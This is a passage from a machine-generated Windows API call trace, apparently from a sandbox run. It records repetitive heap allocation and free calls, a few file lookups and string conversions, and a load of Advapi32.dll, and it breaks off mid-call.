lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0205.846] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0205.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0205.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0205.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0205.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0205.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0205.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0205.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0205.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0205.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0205.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0205.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0205.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0205.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0205.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0205.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0205.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0205.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0205.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0205.848] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/ngBTzibcz-Ml b.gif", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbbeeb20, ftCreationTime.dwHighDateTime=0x1d4c541, ftLastAccessTime.dwLowDateTime=0x7bcd98d0, ftLastAccessTime.dwHighDateTime=0x1d4ca6b, ftLastWriteTime.dwLowDateTime=0x7bcd98d0, ftLastWriteTime.dwHighDateTime=0x1d4ca6b, nFileSizeHigh=0x0, nFileSizeLow=0xb5e0, dwReserved0=0x9da0039, dwReserved1=0x18b53, cFileName="ngBTzibcz-Ml b.gif", cAlternateFileName="NGBTZI~1.GIF")) returned 0xaa5660 [0205.848] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0205.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0205.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0205.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0205.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0205.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0205.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0205.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.849] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0205.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0205.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0205.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0205.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0205.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0205.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0205.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0205.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0205.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0205.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0205.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0205.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0205.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0205.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0205.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0205.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0205.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0205.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0205.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0205.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0205.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.851] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0205.851] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0205.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa188 [0205.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0205.851] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0205.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0205.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0205.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0205.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0205.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0205.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0205.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.852] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0205.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0205.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0205.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0205.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0205.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0205.852] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0205.852] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0205.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0205.853] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0205.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0205.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa248 [0205.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0205.853] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0205.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0205.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0205.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0205.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0205.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0205.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0205.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0205.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.854] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0205.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0205.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0205.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0205.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0205.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0205.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0205.854] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0205.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0205.854] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0205.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0205.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0205.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0205.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0205.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0205.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0205.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0205.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0205.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0205.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0205.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0205.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0205.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0205.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0205.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0205.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0205.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0205.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.856] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0205.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0205.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0205.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.856] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0205.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0205.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0205.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0205.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0205.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0205.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0205.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.857] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.857] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.857] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0205.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0205.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0205.859] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0205.859] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0205.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0205.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0205.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0205.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0205.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0205.860] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0205.860] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0205.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0205.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0205.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0205.861] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0205.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0205.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0205.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0205.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0205.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0205.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0205.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.861] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0205.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.862] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0205.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0205.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0205.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.862] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.862] CharUpperBuffW (in: lpsz="OSVersion", 